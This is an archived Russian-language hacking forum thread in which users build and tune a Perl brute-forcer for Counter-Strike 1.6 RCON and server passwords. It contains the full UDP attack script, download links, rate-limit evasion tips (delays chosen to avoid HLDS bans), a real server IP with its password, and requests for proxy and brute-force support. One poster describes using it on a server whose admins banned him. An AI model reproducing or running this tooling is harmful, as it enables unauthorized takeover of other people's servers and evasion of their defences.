Просмотр полной версии : Брут пароля Counter-Strike 1.6
:( Народ посодействуйте в бруте есть небольшой сырой материалец по написанию брута к CS 1.6( rcon пароль надо найти).Наводку дали такую: смотри в код Born to be pig эксплоита, там есть все что надо для подбора пароля и еще реализован он через Indy UDPClient -те.
Я нашел етот cs-exploit(не нашел где его здесь выложить) вот тока разобратся немогу как реализовать.А брут позарез нужен помогите.
Ты хотя бы выложил ссылку на експ. если её нет, то залей на обменик.
P.S. а ты раздел не перепутал?
P.S.S это случаем не твоя тема с экспом? http://www.nulled.ws/showthread.php?t=115600
хм.. недавно делал) так и забил на ето..
возможно доделаю, выложу.
зы: перл
Ты хотя бы выложил ссылку на експ. если её нет, то залей на обменик.
P.S. а ты раздел не перепутал?
Раздел не перепутал потому как все тут обрыскал в поисках где бы темку то выложить а тут раздел "Изящный взлом паролей" более подходящего не нашел. Ссылка вот на сам експлоит он вешает сервак http://www.softoplanet.ru/go.php?go=http://euro.ucoz.ru/cs-exploit.zip надо бы его в брут переделать или на основе его создать брут нокод в нем есть.
хм.. недавно делал) так и забил на ето..
возможно доделаю, выложу.
зы: перл
;) Спасибо,доделай пожалуста как моно скорее нужно позарез выручай денег на мобильник подкину так сказать поддержу проект =)еси все заработает.
Oledga, пробуй:
тынц (uasc.org.ua/files/csBrute-.ZIP)
csBrute-PlayerPassword - брут PlayerPassword
csBrute-RconPassword - брут RconPassword
в pass.txt пароли.
use: .pl <host> <port> .. <name>
Не работает. Пишет "Hacking Atemp"
http://profiles.inbox.lv/uploads/l/1224190.jpeg
+ Amx Mod банит ип с которого производился брут ...
видимо стоит amx плагин какой-то, и банит.
стандартный hlds тоже банит за 5 неверных..
открой скрипт, и попробуй изменить что-то )
server(player) password:
http://s55.radikal.ru/i150/0906/b1/dd0b8ba86689.jpg
rcon password:
http://s53.radikal.ru/i140/0906/98/750d90833bf2.jpg
з.ы.: hlds банит после 5и неправильных (!)
br1tva, посмотри на свой скриншот, но окно брута PlayerPassword. ты его не подобрал, т.е. ты не знаешь пароль доступа к серверу, т.е. ты не сможешь даже зайти туда, не то что rcon подобрать..
сперва подбери пароль к серверу (csBrute-PlayerPassword) , а потом к rcon'y:
csBrute-RconPassword.pl <host> <port> пароль к серверу <name>
1 скрин это консоль сервера, который запущен у меня на компе, там видно что брутер коннектица и подбирает пасы , но Amx мод палит что это Хак Атака и даже если подобран верный пасс amx шлёт куда подальше .. (=
P.S
Для ввода rcon_password ненужны никакие Playerpasswordi . Зайди на любой сервак открой консоль и погнал вводить rcon_password "pass" (=
под PlayerPassword я имею в виду:
http://s56.radikal.ru/i154/0906/71/f00a34b322e2.jpg
а rcon_password ты не сможешь подбирать, если не зайдешь на сервер.
eLWAux тут ты немного неправ.
Ркон можно брутить и без "ServerPassworda", смотри как :
Пишем в консоле :
rcon_adres: 78.84.231.26
rcon_port: 27015
rcon_password "tut mi podbiraem pass "
Вот и всё . Дальше можно сделать так , rcon sv_password "new pass" .
P.s Можешь проверить на 78.84.231.26:27015 (rcon_pass 123)
br1tva, да, про ето я незнал )
eLWAux и если сделать задержку ввода паса на 3 секунды , то Hlds банить не будет....
Если есть время и желание подправь немного брут сделай с задержкой в 3 сек .. тогда всё будет супер =ъ
Если есть время и желание подправь немного брут сделай с задержкой в 3 сек .. тогда всё будет супер =ъ
в csBrute-RconPassword.pl на 94 строчке добавь:
sleep(3);
Можешь сам изменить как нужно
..................
while(1) {
sleep(3);
# server is not full
# and we are connected
$c = "\xFF\xFF\xFF\xFF".
"rcon ".$id.' "'.$pasw.'" sv_restart 1'."\x00";
syswrite $sock, $c;
sysread $sock,$a,65535;
# print '---'.$a."\n\n\n\n";
if ($a =~ /Bad rcon_password/) {
#bad rcon_password
print ' - '.$pasw."\n";
} else {
print ' [+] '.$pasw."\n";
exit(0);
}
$pasw = shift @p;
if (!$pasw) {print ' [-] password not found!';exit(0);}
}
exit();
но ето не через rcon_connect
uasc.org.ua/files/csBrute-.ZIP
качай. там три версии..
со sleep (3) всё таки сервер банит ... а вот с sleep(10) брутит на ура (=
Oledga, пробуй:
тынц (uasc.org.ua/files/csBrute-.ZIP)
csBrute-PlayerPassword - брут PlayerPassword
csBrute-RconPassword - брут RconPassword
в pass.txt пароли.
use: .pl <host> <port> .. <name>
Спасибо,за ссылочку долго не мог допетрить :confused: как скачать потом скачал ;) .
Как я панимаю сделано на перле ладно попробуем протестить мож че и понаворотим ;)
br1tva, посмотри на свой скриншот, но окно брута PlayerPassword. ты его не подобрал, т.е. ты не знаешь пароль доступа к серверу, т.е. ты не сможешь даже зайти туда, не то что rcon подобрать..
сперва подбери пароль к серверу (csBrute-PlayerPassword) , а потом к rcon'y:
csBrute-RconPassword.pl <host> <port> пароль к серверу <name>
eLWAux сорри за глупые в перле я не сильно шарю вопросы,но опишу порядок своих действий .
1)поставил ActivePerl-5.10.0.1003
2)нашел сервачек в своей локалке к примеру вот
204.205.206.207:27015
3)захожу в файл csBrute-RconPassword.pl блокнотом
правлю там строки(1.2.3.4 меняю на 204.205.206.207;строки abc usernamer не трогаю ),
use IO::Socket;
print "\n".
" CS <RCON password> bruter\n".
" eLwaux(c)2009\n\n\n";
if (!$ARGV[0]) {
print " use: csBrute.pl <host> <port> <server password > <name>\n".
" csBrute.pl 204.205.206.207 27015 abc usernamer\n";
4)2 раза мышью кликаю на файле csBrute-RconPassword.pl ,а он отрывается и тут же закрывается .
:confused: Что не так делаю? Ведь на серваке нет <server password > <name>,а я их не меняю ну и имя админа впринципе никчему для брута.
Dark_cracker
19.06.2009, 12:14
перл запускать нужно через командную строку.
перл запускать нужно через командную строку.
ппс попробовал через командную ввожу IP и порт и нифига стоит eLWAux и br1tva поможите! :(
Напиши свою асю , помогу разобраться !!
Напиши свою асю , помогу разобраться !!
аси нету есь емаил найдеш в моем профиле или луче через форум я постоянно сморю его в ету тему пиши
,а так то я все правильно сделал?У мня 2 сетевухи 2 мож отрубить надо попробую вечером мож запашет :confused:
Для начала тебе нужно немного подправить код csBrute-RconPassword.pl , открой csBrute-RconPassword.pl блокнотом NotePad далее замени код на вот этот:
use IO::Socket;
print "\n".
" CS <RCON password> bruter\n".
" eLwaux(c)2009\n\n\n";
if (!$ARGV[0]) {
print " use: csBrute.pl <host> <port> <server password > <name>\n".
" csBrute.pl 1.2.3.4 27015 abc usernamer\n";
exit(0);
}
$host = shift || '1.2.103.250';
$port = shift || '27015';
$serverpass = shift || 'n0th1ng';
$name = shift || 'pomKa';
$pasw = 'server is not protected by password!';
open (FILE, '<pass.txt') || die(" [-] pass.txt not found!\n");
my @p : shared = <FILE>;
print ' > Loaded '.scalar(@p)." password(s)\n";
chomp(@p);
close(FILE);
my $good = 0;
my $sock = new IO::Socket::INET(
PeerAddr=>$host,
PeerPort=>$port,
Proto=>'udp') || die " [-] server not found!";
$c = "\xFF\xFF\xFF\xFFgetchallenge valve\x0a";
syswrite $sock, $c;
sysread $sock,$a,65535;
# ****A00000000 99271855 2
if ($a =~ /\xFF\xFF\xFF\xFFA00000000\x20(\d+)/) {
$id = $1;
$c =
"\xFF\xFF\xFF\xFF".
"connect 47 ".$id." ".
'"\prot\2\raw\d984a05fa268b7cc6ac052a38960aeb'.rand( 9).'" '.#2
'"'.
'\_cl_autowepswitch\1'.
'\bottomcolor\6'.
'\cl_dlmax\80'.
'\cl_lc\1'.
'\cl_lw\1'.
'\cl_updaterate\20'.
'\model\gordon'.
'\name\\'.$name.
'\topcolor\30'.
'\_pw\cracker'.
'\lac_id\LACID_NOLAC'.rand(9).''.
'\_vgui_menus\1'.
'\_ah\0'.
'\lang\ru'.
'\dzuid\DZUID_0:0:7528570'.rand(9).''.#9
'\rate\25000'.
'\*fid\0'.
'\password\\'.$serverpass.
'"'."\x0a";
# print $c;
syswrite $sock, $c;
sysread $sock,$a,65535;
# full server: ****B 129 "1.2.3.4:25015" 0
# unk password: BADPASSWORD
# serv full : SERVERISFULL
if ($a =~ /SERVERISFULL/) {
print 'FULL SERVER. waiting few seconds..'."\n";
sleep(10);
}
elsif($a =~ /BADPASSWORD/) {
print " [-] Bad PlayerPassword!\n";
exit(0);
}
else { $good = 1; }
} else {
if ($a=~/banned/) {
print ' [!] you are banned!'."\n".
" change IP!\n";
exit(0);
} else {
print ' [-] some trouble with answer ('.$a.')!'."\n";
exit(0);
}
}
while(1) {
sleep(10);
# server is not full
# and we are connected
$c = "\xFF\xFF\xFF\xFF".
"rcon ".$id.' "'.$pasw.'" sv_restart 1'."\x00";
syswrite $sock, $c;
sysread $sock,$a,65535;
# print '---'.$a."\n\n\n\n";
if ($a =~ /Bad rcon_password/) {
#bad rcon_password
print ' - '.$pasw."\n";
} else {
print ' [+] '.$pasw."\n";
exit(0);
}
$pasw = shift @p;
if (!$pasw) {print ' [-] password not found!';exit(0);}
}
exit();
Далее заходишь в c:\WINDOWS\system32\ и находишь там файл cmd.exe , копируешь его в папку с брутом.
В папке с брутом запускаешь cmd.exe и в командной строке прописываешь следующие: csBrute-RconPassword.pl 78.84.231.21 27015
Вместо 78.84.231.21 ип адрес сервера который ты собрался брутить.
P.S
Теперь вопросов не должно быть (=
Для начала тебе нужно немного подправить код csBrute-RconPassword.pl , открой csBrute-RconPassword.pl блокнотом NotePad далее замени код на вот этот:
[color=red] use IO::Socket;
Вместо 78.84.231.21 ип адрес сервера который ты собрался брутить.
P.S
Теперь вопросов не должно быть (=
Спасибус огромнейшус я вроде так и делал тока сначала запускал командную строку а потом мышкой перетаскивал в нее файл csBrute-RconPassword.pl ,прописывал айпи и порт и нифига стоит кстати потом еще раз попробовал по твоему способу нашел пароль ,а перетаскиванием мышью нехатит. Скорость тока малявата и многопоточности бы добавить немешало(для увеличения скорости).Ну это уже кое-что будем эксперемнтировать дальше скорость ведь надо поднимать ,завтра есче на своем цевильном с amx_плагинами серваке попробую обязательно отпишусь. ;)
а если rcon пустой? xDDD
Наскоко я лазил по всяким форумам с рконом писали,что такого в природе не существует могет тока у хакеров :D
со sleep (3) всё таки сервер банит ... а вот с sleep(10) брутит на ура (=
:confused: sleep (3) и sleep(10) ,цифры 3 и 10 означают задержку в секундах перед постановкой нового пароля?Да и ещё а как сохранять пройденный этап в словаре моно как то реализовать. И как сделать с полным перебором по буквам и символам чтоб он работал,т.е. даж без словарика.
eLWAux и если сделать задержку ввода паса на 3 секунды , то Hlds банить не будет....
Если есть время и желание подправь немного брут сделай с задержкой в 3 сек .. тогда всё будет супер =ъ
Провел тест на своем серваке вот что на нем было установлено:
AMX Mod X 1.71
Metamod-1.19
StatsMe 2.8.3
HLGuard 1.9n4 + Reallite HLGuard Anti-Cheats Config 1.7
DeathMatch Mod 1.7 ( csdm_active 1 в amxx.cfg (...addons\amxmodx\configs\ ) )
ATAC 2.5.5.0
Резултаты такие:
1)при sleep (1)-(7)банит сама Hlds
2)при sleep (8) не банит пароль найден :)
Интересную штуку я заметил эта прога может удаленно посылать команды в консоль сервера (в данном случае ркон пароли посылает) было бы класно еслиб она делала разбан игрока всеволишь то надо в словарик с паролем записать amx_unban "204.205.206.207" и подредоктировать csBrute-RconPassword.pl чтоб посылал эту команду, а пока что она впереди прописывает
rcon 1851658075(т.е. id игрока). eLWAux можешь подредактировать csBrute-RconPassword.pl или думаеш что это бредовая идея?
eLWAux сорри за глупые в перле я не сильно шарю вопросы,но опишу порядок своих действий .
1)поставил ActivePerl-5.10.0.1003
2)нашел сервачек в своей локалке к примеру вот
204.205.206.207:27015
3)захожу в файл csBrute-RconPassword.pl блокнотом
правлю там строки(1.2.3.4 меняю на 204.205.206.207;строки abc usernamer не трогаю ),
use IO::Socket;
print "\n".
" CS <RCON password> bruter\n".
" eLwaux(c)2009\n\n\n";
if (!$ARGV[0]) {
print " use: csBrute.pl <host> <port> <server password > <name>\n".
" csBrute.pl 204.205.206.207 27015 abc usernamer\n";
4)2 раза мышью кликаю на файле csBrute-RconPassword.pl ,а он отрывается и тут же закрывается .
Что не так делаю? Ведь на серваке нет <server password > <name>,а я их не меняю ну и имя админа впринципе никчему для брута.
ничего редактировать не надо!
открываешь cmd в той дире, где скрипт, и запускаешь:
csBrute-RconPassword.pl
IP-сервера
порт(по дефолту 27015)
пароль (если пустой, пишеш что угодно)
имя, под которым скрипт будет заходить на сервер
Да и ещё а как сохранять пройденный этап в словаре моно как то реализовать. И как сделать с полным перебором по буквам и символам чтоб он работал,т.е. даж без словарика.
возможности распределонного брута пока нету.
"как сделать с полным перебором по буквам и символам"? все пароли в файле pass.txt, туда и кидай все что нужно.
с помощью спец. програм создавай список и юзай его.
2)при sleep (8) не банит пароль найден.
вот за тест огромное спасибо. сейчас перезальлю и поставлю задержку в 8секунд.
eLWAux можешь подредактировать csBrute-RconPassword.pl или думаеш что это бредовая идея?
да запросто, ето 5минут.. тольно зачем?)
сбрутил пароль ркон, зашел на сервер и командуешь там..
хотя сделаю сейчас.. ждите 20минут )
удаленное администрирование , зная RCON пароль, кс сервера
http://i050.radikal.ru/0906/f7/8696884b4281.jpg
csBrute-Rcon.pl <host> <port> <rcon password> <name>
uasc.org.ua/files/csBrute-.zip
кароче, мегообновление :)
все скрипты поправил, все доделал..
описание (http://uasc.org.ua/2009/06/csbrute-rcon-player-server-passwords/)
скачать (http://uasc.org.ua/files/csBrute-.zip)
кароче, мегообновление :)
все скрипты поправил, все доделал..
описание (http://uasc.org.ua/2009/06/csbrute-rcon-player-server-passwords/)
скачать (http://uasc.org.ua/files/csBrute-.zip)
;) Отлично спасибо у меня тока вот какой вопрос счас возник почему там два файлика csBrute-RconPassword1.pl и csBrute-RconPassword2.pl(ну в принципе и в старом было тоже 2) они оба используются в переборе или надо сначала попробовать запустить первый csBrute-RconPassword1.pl в cmd.exe а потом второй попробовать csBrute-RconPassword2.pl (я к тому спрашиваю потому как в старом тоже 2 лежало файла csBrute-RconPassword.pl и csBrute-RconPassword2.pl я тестил тока со sleep (8) тока с csBrute-RconPassword.pl)? А так все COOL завтра попробую еще потестить потом отпишусь обязательно.
да запросто, ето 5минут.. тольно зачем?)
сбрутил пароль ркон, зашел на сервер и командуешь там..
хотя сделаю сейчас.. ждите 20минут )
Хочу попробовать разбанить себя без ркон-пароля кидаю в словарик amx_unban "204.205.206.207" и вуаля разбан,а мож получится.Видиш ли там где на самом деле я собрался брутить пас там админы ухо в остро держать,спалят меня и ппс могут вообще отключить,а так я свое дело зделаю быстро и незаметно.Там айпишник хрен поменяешь,а если поменяю обещали вообще вырубить уже не первый раз ведь.Так что помоги мож че и выйдет,а то я пробовал кидать в словарик amx_unban "204.205.206.207" а он мне в консоле сервака такую строку выдает rcon 1851658075 "amx_unban "204.205.206.207"" ,а выдавал бы такую в консоле сервака "amx_unban "204.205.206.207" без rcon 1851658075 мож ченить и получилось.
Наскоко я лазил по всяким форумам с рконом писали,что такого в природе не существует могет тока у хакеров :D
еще как существует, сам проверял: поднимал серв на локалке пытался подключиться с другой машины... и облом, если ркон пустой, то хрен получится((
мож кто знает лекарство от таких умников?
ЗЫ: Oledga, дай линк где прочитал что ркон пустым не может быть...
[QUOTE=Oledga]Да счас уже не припомню где и находил ,но помоему на тех сайтах где выложены инструкции по созданию сервака. Но даже из своего личного опыта попробуй запустить HLDS без ркона и у тя не получится там минимум три символа просит,тока тода запускается.
Так если ты админ в локалке что мешает тебе поставить пароль в конфигах сервака (1. Делаем себя Админом !
найди файл users.ini (...\cstrike\addons\amxmodx\configs\ )
найдите в нем строчку "User" "password" "abcdefghijklmnopqrstu" "a"
Первое - ник игрока; Второе - пароль на доступ; Третье - уровень доступа; Четвёртое - флаги.
Далее зайдите в ...\cstrike в файл autoexec.cfg и исправте эту строчку:
setinfo "_pw" "ВАШ ПАРОЛЬ"
пароль должен быть таким, каким вы его писали в users.ini
Сохраните и закройте файл.
перед конектом к серверу в консоле пишете
setinfo _pw mypassword.
А вообще пароль можно здесь еще глянуть C:\Program Files\Counter-Strike 1.6\platform\config\
файл ---- Server.vdf там и лежит ркон
Или проще его снести и поставить новый. :D
кароче, мегообновление :)
все скрипты поправил, все доделал..
описание (http://uasc.org.ua/2009/06/csbrute-rcon-player-server-passwords/)
скачать (http://uasc.org.ua/files/csBrute-.zip)
Протестил я твою новую мегасборку,результаты такие:
1)csBrute-RconPassword1.pl выдает ложный пароль на 7 в списке pass(т.е. находит не тот пароль)
2)csBrute-RconPassword2.pl виснет после 5 паролей
3)csBrute-PlayerPassword.pl работает отлично находит пароль(даже работает при sleep (1) не банит)
1)csBrute-RconPassword1.pl выдает ложный пароль на 7 в списке pass(т.е. находит не тот пароль)
2)csBrute-RconPassword2.pl виснет после 5 паролей
можна узнать, на какой сборке ты ето тестировал?
особенно интересуют установленные плагины amx и anti-hack мод в hlds
можна узнать, на какой сборке ты ето тестировал?
особенно интересуют установленные плагины amx и anti-hack мод в hlds
На нем было установлено:
AMX Mod X 1.71
Metamod-1.19
StatsMe 2.8.3
HLGuard 1.9n4 + Reallite HLGuard Anti-Cheats Config 1.7
DeathMatch Mod 1.7
ATAC 2.5.5.0
ssServer3.0 ---античит
Hlds похоже в ней дело,в её консоли видно и AMX похоже тут непричем. Тот код который дал br1tva работает на ура смотри на странице 3 сообщение #26 тока sleep бы там какнить уменьшить чтоб не банила было бы хорошо.
eLWAux посмотри пожалуста вот эти бруты MD5 Brute Force Cracker in Perl with Forking 0.1.0(Очень функциональный брутфорс для MD5-хешей на перле. Умееет брутить по словарю и грубым перебором.) качай его отсюда http://www.web-hack.ru/download/download.php?go=126 или вот еще вот этот genom-mail.ru bruter v 4.0 - брутфорс для mail.ru(посимвольный брут) качай здесь http://rapidshare.com/files/147175077/GeNoM-mail.ru_bruter_secnull.rar.html (инфа по нему здесь есть http://exploit.in/forum/index.php?showtopic=17045&pid=94784&mode=threaded&show=&st=& ).Может сможешь добавить в csBrute-RconPassword.pl атаку грубым перебором.Млин,а то без нее никак,со словарями время тока трачу,а так была бы полная уверенность.
GreezeMonkey
23.06.2009, 17:31
Ребят, в частности eLWAux, вы используете метод подключения к серверу кс через уязвимость, которая используется в эксплоите? т.е. этот метод работает не так, как подключается обычный клиент(сама кс)?
и еще вопрос, почему в $c .= '\name\\'.$name не просто 'name '.$name, а со слэшами?
:( ппс eLWAux меня забанили поздравь меня ,сначала вроде перебирал дней 5 потом раз и нашел пароль ,тут же отключился решил еще раз проверить он или не он и ппс забанили вышел с другого IP проверил не он видать меня админы надули и спалили хз как так получилось короче думаю терь надо как то реализовать работу чере прокси(чють выше в моем сообщении есть 2 проги на перле в одной из них даже описаловка есть на русском,выручай как нибудь из них слепить офигенный брут) помощь твоя требуется выручай,куда пропал то? :(
Да счас уже не припомню где и находил ,но помоему на тех сайтах где выложены инструкции по созданию сервака. Но даже из своего личного опыта попробуй запустить HLDS без ркона и у тя не получится там минимум три символа просит,тока тода запускается.
Так если ты админ в локалке что мешает тебе поставить пароль в конфигах сервака (1. Делаем себя Админом !
найди файл users.ini (...\cstrike\addons\amxmodx\configs\ )
найдите в нем строчку "User" "password" "abcdefghijklmnopqrstu" "a"
Первое - ник игрока; Второе - пароль на доступ; Третье - уровень доступа; Четвёртое - флаги.
Далее зайдите в ...\cstrike в файл autoexec.cfg и исправте эту строчку:
setinfo "_pw" "ВАШ ПАРОЛЬ"
пароль должен быть таким, каким вы его писали в users.ini
Сохраните и закройте файл.
перед конектом к серверу в консоле пишете
setinfo _pw mypassword.
А вообще пароль можно здесь еще глянуть C:\Program Files\Counter-Strike 1.6\platform\config\
файл ---- Server.vdf там и лежит ркон
Или проще его снести и поставить новый. :D
сорри, только ща заглянул в тему :)
у меня там никакого файла нет... :rolleyes:
Чет у мну не получилось а можете ктото дать пароль от этого сервера 91.203.134.10:27026
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot